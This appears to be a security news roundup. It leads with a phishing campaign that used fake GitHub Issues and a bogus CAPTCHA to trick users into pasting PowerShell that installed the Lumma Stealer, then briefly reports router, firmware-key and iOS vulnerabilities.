Large-scale phishing attack on GitHub users
After clicking on a link to a third-party site that was no longer active, the user was prompted to “verify that you are not a robot.” And then came the attackers’ brilliant find: to “verify,” they were prompted to open the Windows command menu using the Win+R key combination and paste a piece of code previously placed in the clipboard. This code opened the PowerShell console, downloaded, and executed the malicious file. If you think that such a straightforward attack will definitely not affect developers, there is at least one argument why you should still be wary of such “manual malware.”
This is what the Issues looked like when the attackers sent them from disposable GitHub accounts:
At the moment, all such comments have been removed from the repositories. But the submission of a bug report initiated the sending of a completely legitimate notification from GitHub, as in the screenshot at the beginning of the article. It is unlikely that a tech-savvy user will react to such a provocation and actually execute incomprehensible code on their PC with their own hands. But do not forget that managers or even contractors who are far from technology can also be subscribed to the GitHub mailing list, and such a trick can work with them.
This is what user “verification” looks like. If you look at the site code, you can see how the script is copied to the clipboard:
The script initiates the download and execution of the malware, and here the user will have to confirm the launch of the unknown file again:
According to BleepingComputer, the malware is the Lumma Stealer infostealer, which became widespread in 2023 (you can read more about it here Here). The goal of the attackers is to steal saved passwords and browser sessions. This local incident is a reason to once again discuss the approach “it won't affect me”. Firstly, there are many examples of even experienced users falling victim to such attacks. Secondly, as mentioned above, the attack can affect other employees of your organization. Thirdly, this is far from the only attack of this kind. Less than a month ago reported about an alternative tactic of attacks on GitHub: links to malicious code were sent under the guise of patches to public repositories. And this trick was, to put it mildly, even simpler: the victim was asked to download a password-protected archive, unpack it themselves and run the malicious program. Attackers are constantly testing new methods of social engineering, sending messages in tens and hundreds of thousands, reasonably expecting that sooner or later the next trick will work.
What else happened?
Three studies were published by Kaspersky Lab specialists last week. These are analysis activities of the Twelve group. Study Unicorn malware used to steal data. And analysis SambaSpy remote access trojan that attacks users in France and Italy.
Critical vulnerabilities discovered in D-Link routers. One of the problems allows you to open remote access via Telnet protocol and log in using a built-in password. The affected devices are COVR-X1870, DIR-X5460 and DIR-X4860.
On the black market sell data of users of the Temu marketplace. The company itself, however, denies that the data is real.
Researchers from BINARLY have released addition to the PKfail study published in July (we wrote about it here). Let us remind you that we are talking about the use of identical private keys in the implementation of UEFI Secure Boot. These “test” keys were found in many motherboards, laptops and servers from various manufacturers, and one of the keys definitely became publicly available due to a supplier error. In the summer, BINARLY released a public service for checking UEFI firmware for test keys, which in the worst case can be used to completely compromise the system. Among more than 10 thousand downloaded firmware, 8.5% had test keys embedded. Some of the keys were previously unknown, which made it possible to expand the list of affected devices. Among them, for example, were the popular Odroid single-board computers, as well as the Beelink Mini 12 Pro and Minisforum HX99G mini-computers.
In the latest release of the iOS 18 operating system closed 33 vulnerabilities. One of the bugs theoretically opened access to private data on a locked phone using Siri.
